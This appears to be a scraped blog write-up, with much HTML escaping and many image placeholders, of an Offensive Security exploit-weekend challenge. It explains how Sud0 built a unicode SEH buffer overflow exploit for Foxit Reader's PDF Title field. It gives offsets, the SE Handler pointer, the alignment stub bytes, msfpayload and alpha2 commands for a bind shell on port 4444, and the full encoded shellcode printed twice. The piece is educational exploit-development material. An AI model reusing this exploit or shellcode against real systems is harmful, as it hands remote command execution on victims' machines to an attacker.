The challenge was built around a vulnerability in Foxit Reader. Each participant was pointed to a Proof of Concept<\/a> exploit, clearly pinpointing the overflow and indicating control over a structured exception handling record. Offensive Security posted the following message on their blog :<\/p>\n Aloha Offsec students! You\u2019ve been slapped around by Bob, abused by Nicky and crushed by NNM. Just as you thought it was over, Offensive Security now comes up with a brand new type of pain. This one is for all you hardcore exploit developers out there, who want a real challenge \u2013 an Offsec \u201cExploit Weekend\u201d. For more information, check out the Offsec Student forms<\/a>. If you haven\u2019t signed up for the 1day club forums, send in an email to our orders dept. with your OSID!<\/p>\n<\/blockquote>\n What follows below are the steps taken by Sud0 to complete the challenge\u2026 I only analyzed his exploit \/ gathered all his steps, added some comments, and built a little story around it. I take no credit for this exploit, Sud0 did all of the work by himself, in less than 5 hours\u2026 ouch \ud83d\ude42<\/p>\n Have fun with it ! - corelanc0d3r<\/p>\n After quickly analyzing the pdf file, it was clear that the PDF reader is vulnerable to a buffer overflow when parsing an overly long string in the "Title" field. (Simply open the pdf file in a editor or use Didier Stevens' pdf-parser.py tool to list the elements in the pdf file)<\/p>\n When opening the PoC pdf file in Foxit Reader (with Immunity Debugger attached to it), an access violation is triggered :<\/p>\n (An attempt was made to write beyond the end of the current stack frame, which has triggered the access violation.)<\/p>\n The SEH Chain looks like this :<\/p>\n 00410041 = Unicode utf converted representation of 'AA'\u2026 so it looks like we control one of the SEH records.<\/p>\n After passing the exception to the application (Shift F9), another access violation is triggered, resulting in the following SEH Chain :<\/p>\n When passing the exception again, the exception handler should get called (00410041). Usually, when overwriting an exception handler with A's, EIP will point to 41414141 (after the exception is passed), and the debugger will break again because in most cases this is not a valid address. In this case, however, we are dealing with unicode, and in our case 00410041 is a valid address :<\/p>\n (so you would need to set a breakpoint at 00410041 before passing the exception to make sure you can verify that EIP was controlled).<\/p>\n Anyways, unicode payload requires a specific approach, as explained in tutorial 7<\/a>. In any case, we will need to find a pointer (to be put in the SE Handler field), which is unicode compatible, and should bring us back either at nseh, or directly in our payload. Unicode compatible pointers start with a null byte, so unlike typical string based buffer overflows, we now have to look for pointers with null bytes.<\/p>\n First of all, the offset to nseh \/ seh must be determined.<\/p>\n Replace the A's in the Title field with a cyclic pattern (10000 bytes or so). You can create a cyclic pattern directly from within Immunity Debugger using the following function in pvefindaddr<\/a> :<\/p>\n Open mspattern.txt, copy the pattern and use it to replace the A's in the PoC pdf file :<\/p>\n Open the modified pdf file again in Foxit Reader (with Immunity Debugger attached). When the application crashes (before passing the exception to the application), run<\/p>\n This will calculate the offset to nseh and seh :<\/p>\n => offset to nseh is 538. The script detected that the payload is unicode, so you just need to put 538 characters in your payload and when it gets converted to unicode, you'll control nseh and seh.<\/p>\n A quick look at the load modules (!pvefindaddr modules) reveals a few things<\/p>\n This means that we should be able to find a good p\/p\/r pointer in the application binary itself. A 'good' pointer is a pointer that is not only unicode compatible, but it should not break the buffer string either (so the 2 non-null bytes should be ascii printabled, and the instructions the bytes represent should not break the exploit flow).<\/p>\n Using !pvefindaddr p1 -m foxit, we query the application binary, gather all p\/p\/r pointers and write them to a file called ppr1.txt<\/p>\n Filter out all lines that do not contain the word "Unicode" and you'll have your list of possible pointers. Question remains : which one should you take ?<\/p>\n The answer is simple : take the one that won't break things, and that might help you getting you closer to your buffer when it gets executed as if the pointer were instructions. (Read tutorial 7 to understand what we mean with this). This process is trial & error<\/p>\n Sud0 decided to use 006A004B (write "\\x4B\\x6A" into the SE Handler field ( = K4)). In order to test, put "AA" at nseh (00410041), and put 9000 B's or so after the SE record. Validate that the new SEH record works :<\/p>\n That looks perfect. Set a breakpoint at the SE Handler pointer (bp 006A004B) and then pass the exception (twice - use Shift F9) until the breakpoint is hit :<\/p>\n Use F7 to step through these 3 instructions (pop ebx, pop ecx, ret 4) . Right after RET is executed, you see this in the CPU view :<\/p>\n We are now executing code on the stack. If we look at the stack, at 0012F7A8 and up, we can see our B's\u2026 so we have plenty of space to put our payload here :<\/p>\n The payload obviously also needs to be unicode compatible.<\/p>\n The goal is to build an exploit with a bindshell listening on port 4444, so we can easily create the required shellcode using metasploit's msfpayload :<\/p>\n .\/msfpayload windows\/shell_bind_tcp R | .\/msfencode -b '\\x00' -t raw > \/pentest\/exploits\/alpha2\/bind4444.bin<\/strong><\/p>\n (You need to exclude null bytes, as the alpha2 unicode encoder does not accept null bytes)<\/p>\n When converting the raw shellcode to unicode, you need to specify a bufferregister. This bufferregister is key in this exploit. If you have tried to use a register such as EAX, EBX, ECX, EDX and so on, then you probably discovered that there was no way\/no easy way to make that register point to the begin of your payload. Of course, you can pop some values from the stack to make a register point "close" to your shellcode\u2026 but all pointers are below the shellcode. And the opcode to add some values to a register break the exploit\u2026 so using a register is not an option here.<\/p>\n So Sud0 decided to use ESP as bufferregister. Skylined's alpha2 tool mentions this about using esp as bufferregister :<\/p>\n \n Creating the unicode shellcode :<\/p>\n root@bt:\/pentest\/exploits\/alpha2# .\/alpha2 --unicode esp < bind4444.bin <\/strong><\/p>\n Now, still at the first byte of nseh, Sud0 looked at the stack, and determined his approach :<\/p>\n The first pointer on the stack actually points into a location we control. (0012F470), but the space is too small to host shellcode. A bit further on the stack, we also see pointers to a bigger part of our payload (0012F7A8). So the idea is to pop values off the stack until we get 0012F7A8, then make ESP point at it, and jump to it. At that location, we can put our shellcode.<\/p>\n The SEH pointer (006A004B), when translated into instructions, look like this :<\/p>\n That means that EDX needs to be writeable. Before the code at nseh \/ seh executes, the registers look like this :<\/p>\n EDX points into ntdll\u2026 not a writeable location.<\/p>\n Easiest way to solve this, is by popping the first pointer (which points to the stack) into EDX. Opcde is 5A.<\/p>\n After those 4 instructions are executed, we end up here :<\/p>\n So far so good. nseh is now set to "\\x5a\\x41" and seh is "\\x4b\\x6a".<\/p>\n The pointer we want to get at, is 3rd from the top of the stack :<\/p>\n You could write some simple venetian code to pop 3 times. Or you can just use a popad to pop values from the stack, one for each register (except esp). There are plenty of ways to get the desired value into esp and then jump to it. I'll explain what Sud0 did :<\/p>\n After the nseh & seh instructions are executed, ESP points at 0012F3C8 (which contains a pointer to a buffer we control\u2026 but not to the location in the buffer we want. The pointer points at the SEH record, so jumping to that location would create a little loop).<\/p>\n But - all of that can be fixed easily : A simple POP ESP will make the stack actually point at that pointer : <\/p>\n Then a POPAD is used to jump further down into the buffer :<\/p>\n That's nice - but it destroyed the registers. The NOP (ADD BYTE PTR DS:[ECX],AL) won't work because ECX does not point at a writeable location anymore. ECX contains data that was popped off the stack earlier. So if we can make ecx point at a writeable location by manipulating the value on the stack, we win.<\/p>\n That means that we need to figure out the location on the stack that will be used to populate ECX, and we have to make it point to a writeable location. After doing some simple math, we see that 0012F7C1 holds the data that will be put in ECX. That is right below our alignment stub, so if we follow the stub with a writable address, we can overcome this issue.<\/p>\n Then finally, a RET will make us jump to a controlled location, with ESP pointing at the first byte. Fortunately, the opcode for ret (C3) does not get mangled.<\/p>\n The entire alignment block looks like this :<\/p>\n \n <\/p>\n 00B30030 is a static location in the foxit reader.exe binary, and is writable :<\/p>\n After executing the alignment stub, we end up here :<\/p>\n The ret will bring us to the begin of the B's. So the only thing we have to do is place our shellcode at that location (which is encoded using ESP as bufferregister) and let it run.<\/p>\n Note : as soon as PUSH ESP opcode is put into the buffer, you'll see that this has an impact on the seh chain. Don't worry about it, because you still control the SE record.<\/p>\n<\/blockquote>\n As indicated by skylined, the encoded shellcode will write to ebp. That means that ebp has to point to a writeable location as well. The payload so far looks like this :<\/p>\n When the shellcode starts executing, we see this :<\/p>\n 00610041 is not writeable. But ECX still points at a writeable location. So we simply have to modify the shellcode and write to ECX to overcome this issue. Simply change the byte from 55 to 61 to change the destination register :<\/p>\n Let the code run\u2026 w00000t !!!<\/p>\n You can easily put in other shellcode, as long as you use ESP as baseregister, and modify the second byte of the shellcode :<\/p>\n\n
This is the deal:<\/strong> We provide you with a proof of concept, with EIP handed to you on a golden platter. All you need to do is get a shell\u2026.muhahaha. The event will take place next weekend, 13th-14th of November and is open to Offsec alumni only. The first person to send in a working POC with a bindshell payload on port 4444 wins a 32 GB WiFi Ipad!<\/p>\n
\nSud0's story :<\/h3>\n
![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb5.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb7.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb8.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb34.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb10.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb35.png\" "\\"image\\"")
<\/a><\/p>\n!pvefindaddr suggest<\/pre>\n
![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb36.png\" "\\"image\\"")
<\/a><\/p>\n\n
![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb37.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb38.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb39.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb40.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb19.png\" "\\"image\\"")
<\/a><\/p>\n\n
![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb41.png\" "\\"image\\"")
<\/a><\/p>\n\n
Unicode baseaddress code using esp will overwrite the byte of memory pointed to by ebp!<\/p>\n<\/blockquote>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb21.png\" "\\"image\\"")
<\/a><\/p>\n0012F7AC 4B DEC EBX\n0012F7AD 006A 00 ADD BYTE PTR DS:[EDX],CH<\/pre>\n
![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb23.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb22.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb42.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb25.png\" "\\"image\\"")
<\/a><\/p>\nPhase 1 : jump to shellcode :<\/h4>\n
![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb43.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb44.png\" "\\"image\\"")
<\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb45.png\" "\\"image\\"")
<\/a><\/p>\n0012F7B0 41 INC ECX\n0012F7B1 0061 00 ADD BYTE PTR DS:[ECX],AH\n0012F7B4 5C POP ESP\n0012F7B5 0041 00 ADD BYTE PTR DS:[ECX],AL\n0012F7B8 61 POPAD\n0012F7B9 0041 00 ADD BYTE PTR DS:[ECX],AL\n0012F7BC 54 PUSH ESP\n0012F7BD 0041 00 ADD BYTE PTR DS:[ECX],AL\n0012F7C0 C3 RETN<\/pre>\n
The alignment code is followed by the following bytes (to make ECX point at a writeable location) : <\/p>\n0012F7C1 00B3 003000B3 ADD BYTE PTR DS:[EBX+B3003000],DH<\/pre>\n
![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb29.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb46.png\" "\\"image\\"")
<\/a><\/p>\n\n
Phase 2 : fix issue with ebp<\/h4>\n
seh = "\\x5A\\x41\\x4B\\x6A<\/span>"\nalign = "\\x41\\x61\\x5C\\x5C\\x41\\x61\\x41\\x54\\x41\\xC3<\/span>" # Align + SEH ... SEH = 0x006A0046\ncontrol="\\xB3\\x30\\xB3<\/span>" # control of ECX to point it to writeable address\n#(need only two bytes, third one is junk)\n\nshellcode = "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ<\/span>"\nshellcode += "11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBJ9JKuK9IbTO4jTNQj<\/span>"\nshellcode += "2X2pwMawYqT2kpqNPTKPvzldKD6MLTKMvZhRkCNmPrkmfnXnoMHqeZSPYiqxQ9ok1op2kp<\/span>"\nshellcode += "lldLdDKmuMlTKNtKxRXiqZJBkPJkhTKpZKpiqZKzCMdQ9tKNTDKYqXnmaIoMa5pIlFLQt5<\/span>"\nshellcode += "pRTYwva8OlMKQ5wHkHtMk3Lo4O845xatKNznDIqhkpfRkzlnkDKPZmLKQJKTK9ttKm1YX2<\/span>"\nshellcode += "iPDktmLoq5sUbkXo96t2iYUu97Rs8rnpNlNxlR2yX5OkOYokOsYOUkTekqn8XIRpsQwMLl<\/span>"\nshellcode += "dnrHhTNYoIoKOU9neM8aXrLrLmPoQphoCNRlnRD38QesCperRqx1LMTYz2iGvOfyoNu9tr<\/span>"\nshellcode += "i8BR0gK78uRpMGLsWKlldPRyXQQKOyoiooxrL1QbNnxs8mspo1bOunQYK1xOlKtm7qy9SO<\/span>"\nshellcode += "xlpnxmPmPs8KpOcRUPd1XPdo0orRYOxpoPi3DS5PhpErXpp2Lp1eyqxpLmTJqQyWqMagbB<\/span>"\nshellcode += "Jp0NsPQr2KO8PLqupNpioOeIxZjA<\/span>"<\/pre>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb47.png\" "\\"image\\"")
<\/a><\/p>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb48.png\" "\\"image\\"")
<\/a><\/p>\nseh = "\\x5A\\x41\\x4B\\x6A<\/span>"\nalign = "\\x41\\x61\\x5C\\x5C\\x41\\x61\\x41\\x54\\x41\\xC3<\/span>" # Align + SEH ... SEH = 0x006A0046\ncontrol="\\xB3\\x30\\xB3<\/span>" # control of ECX to point it to writeable address\n#(need only two bytes, third one is junk)\n\n# Unicode Shellcode Alpha2 encoded with a small modification because we had to\n# play with registers in the align shellcode before\nshellcode = "TaYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ<\/span>"\nshellcode += "11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBJ9JKuK9IbTO4jTNQj<\/span>"\nshellcode += "2X2pwMawYqT2kpqNPTKPvzldKD6MLTKMvZhRkCNmPrkmfnXnoMHqeZSPYiqxQ9ok1op2kp<\/span>"\nshellcode += "lldLdDKmuMlTKNtKxRXiqZJBkPJkhTKpZKpiqZKzCMdQ9tKNTDKYqXnmaIoMa5pIlFLQt5<\/span>"\nshellcode += "pRTYwva8OlMKQ5wHkHtMk3Lo4O845xatKNznDIqhkpfRkzlnkDKPZmLKQJKTK9ttKm1YX2<\/span>"\nshellcode += "iPDktmLoq5sUbkXo96t2iYUu97Rs8rnpNlNxlR2yX5OkOYokOsYOUkTekqn8XIRpsQwMLl<\/span>"\nshellcode += "dnrHhTNYoIoKOU9neM8aXrLrLmPoQphoCNRlnRD38QesCperRqx1LMTYz2iGvOfyoNu9tr<\/span>"\nshellcode += "i8BR0gK78uRpMGLsWKlldPRyXQQKOyoiooxrL1QbNnxs8mspo1bOunQYK1xOlKtm7qy9SO<\/span>"\nshellcode += "xlpnxmPmPs8KpOcRUPd1XPdo0orRYOxpoPi3DS5PhpErXpp2Lp1eyqxpLmTJqQyWqMagbB<\/span>"\nshellcode += "Jp0NsPQr2KO8PLqupNpioOeIxZjA<\/span>"<\/pre>\n![\"image\"](\"\/wp-content\/uploads\/2010\/11\/image_thumb50.png\" "\\"image\\"")
<\/a><\/p>\nSud0 would like to thank :<\/h3>\n
\n
![\"\"\/](\"http:\/\/www.digiprove.com\/images\/dp_seal_trans_16x16.png\")